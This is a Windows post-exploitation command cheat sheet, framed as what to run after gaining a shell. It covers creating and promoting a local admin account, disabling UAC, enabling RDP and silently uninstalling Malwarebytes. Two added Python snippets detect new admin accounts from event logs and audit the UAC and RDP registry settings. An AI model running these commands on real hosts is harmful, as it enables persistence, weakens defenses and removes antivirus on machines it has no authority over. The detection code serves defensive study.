Windows Post Exploitation Commands

So after we’ve gained our first shell, we’ll need to execute a series of commands on the compromised system to gain further control and solidify our footprint. The following are some of the more common Windows commands, in no particular order.

User Accounts & Groups:

Create a New Account

net user username password /add

or alternatively, if you do not want to enter the password in plain text, run the following:

net user username * /add

and then enter the password twice when prompted at the command line.


Add User to Local Administrators Group

net localgroup administrators username /add


See Current User

whoami


See Current User’s Privileges

whoami /PRIV


See Local Admin Group Members

net localgroup administrators


See Local User Group Members

net localgroup users
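Both account commands above leave a trail in the Windows Security log: creating a user produces event 4720 (a user account was created) and adding a member to Administrators produces event 4732 (a member was added to a security-enabled local group). The following Python is an added example, not part of the original cheat sheet, that correlates those two events by SID over constructed sample records. The field names follow the real 4720/4732 event schemas, but the sample values, the ten-minute window and the list of watched groups are assumptions made here for the illustration.

```python
"""Correlate 4720 (account created) with 4732 (added to local group) events.

A 4732 into a privileged local group is flagged on its own; a 4732 whose
member SID was created by a 4720 shortly before is raised to high severity,
because that is exactly the net user / net localgroup pair shown above.
"""
from datetime import datetime, timedelta

# Constructed sample events in the shape of Windows Security log records.
# Field names match the real event schemas; the values are made up.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2024-05-01T10:00:05", "SubjectUserName": "alice",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-111-222-333-1105"},
    {"EventID": 4732, "Time": "2024-05-01T10:00:07", "SubjectUserName": "alice",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-111-222-333-1105"},
    {"EventID": 4720, "Time": "2024-05-01T11:30:00", "SubjectUserName": "hr-admin",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-111-222-333-1106"},
    {"EventID": 4732, "Time": "2024-05-02T09:00:00", "SubjectUserName": "hr-admin",
     "TargetUserName": "Remote Desktop Users", "MemberSid": "S-1-5-21-111-222-333-1106"},
    {"EventID": 4732, "Time": "2024-05-01T12:00:00", "SubjectUserName": "bob",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-111-222-333-500"},
]

# Local groups whose membership changes are worth an alert (assumed list).
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}


def _ts(stamp):
    return datetime.fromisoformat(stamp)


def find_suspicious_account_changes(events, window=timedelta(minutes=10)):
    """Return a list of alert dicts ordered by event time.

    medium: any 4732 into a group in PRIVILEGED_GROUPS
    high:   that 4732's MemberSid was created by a 4720 within `window`
    """
    # Index account-creation events by the SID they created.
    created = {e["TargetSid"]: e for e in events if e["EventID"] == 4720}
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] != 4732:
            continue
        if ev["TargetUserName"].lower() not in PRIVILEGED_GROUPS:
            continue
        detail = (f"{ev['SubjectUserName']} added {ev['MemberSid']} "
                  f"to {ev['TargetUserName']}")
        severity = "medium"
        origin = created.get(ev["MemberSid"])
        if origin is not None:
            age = _ts(ev["Time"]) - _ts(origin["Time"])
            if timedelta(0) <= age <= window:
                severity = "high"
                detail += (f"; account {origin['TargetUserName']} was created "
                           f"{int(age.total_seconds())}s earlier by "
                           f"{origin['SubjectUserName']}")
        alerts.append({"severity": severity, "time": ev["Time"], "detail": detail})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_account_changes(SAMPLE_EVENTS):
        print(f"[{alert['severity']:6}] {alert['time']} {alert['detail']}")
```

On the sample data this yields one high-severity alert (svc_backup created and added to Administrators two seconds apart) and two medium ones; the join is done on the SID rather than the account name because 4732 frequently reports the member name as "-".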

______________________________________________________________________________

System Commands:

Remote Shutdown or Restart

shutdown -r -m \\computername

(-r restarts the remote host; use -s in its place to shut it down instead)


Configuring UAC

Disable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Enable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f


Configuring Remote Desktop

Enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable RDP:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
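The two registry values toggled above (EnableLUA for UAC, fDenyTSConnections for RDP) can be checked in the other direction with `reg query`. The Python below is an added example, not from the original page, that parses the text format `reg query` prints and flags either value when it is 0. The sample output, the expected hardened values and the absent-value handling are assumptions made here; the parser only reads REG_DWORD entries.

```python
"""Audit UAC and RDP state from `reg query` output.

Run on Windows as:  reg query "<key>" > out.txt  for each key, concatenate,
and feed the text to audit_uac_rdp(); here constructed output is embedded.
"""
import re

# Constructed text in the layout `reg query <key>` prints; it describes a host
# where UAC has been switched off and RDP switched on with the commands above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
"""

# Hardened values for the two settings the page's commands change (assumed policy:
# UAC on, inbound RDP denied).
EXPECTED = {
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "EnableLUA"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "fDenyTSConnections"): 1,
}

# Value lines are indented: "<name>  <type>  <data>"; key lines are not indented.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_reg_query(text):
    """Return {(key_path, value_name): int} for every REG_DWORD in the output."""
    values, current_key = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            current_key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and current_key and m.group(2) == "REG_DWORD":
            values[(current_key, m.group(1))] = int(m.group(3), 16)  # "0x0" -> 0
    return values


def audit_uac_rdp(text):
    """Compare each expected value against what reg query reported.

    status: "ok" (matches), "WEAK" (present but not the hardened value),
            "absent" (value not set, so the OS default applies).
    """
    found = parse_reg_query(text)
    findings = []
    for (key_path, name), want in EXPECTED.items():
        got = found.get((key_path, name))
        status = "absent" if got is None else ("ok" if got == want else "WEAK")
        findings.append({"value": name, "found": got, "expected": want,
                         "status": status})
    return findings


if __name__ == "__main__":
    for f in audit_uac_rdp(SAMPLE_REG_QUERY):
        print(f"{f['status']:6} {f['value']}: found={f['found']} expected={f['expected']}")
```

Note that `reg query` prints DWORDs as hex (0x0, 0x1), which is why the parser uses base 16; on the sample text both values come back WEAK, and replacing the 0x0 with 0x1 turns them to ok.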

______________________________________________________________________________

Enumerating Software:

See Installed Applications

wmic product get Name

(this enumerates installed software on the system; note that it only covers products installed through Windows Installer, and querying this class makes Windows run a consistency check of every MSI package that can trigger repairs, so it is slow and noisy)

To narrow these results or check for specific applications try playing with the following:

wmic product where "Name like '%Malwarebytes%'" get Name, Version

wmic product where "Name='Malwarebytes'" get Name, Version


Uninstall Applications Silently

wmic product where "Name='Malwarebytes'" call uninstall /nointeractive
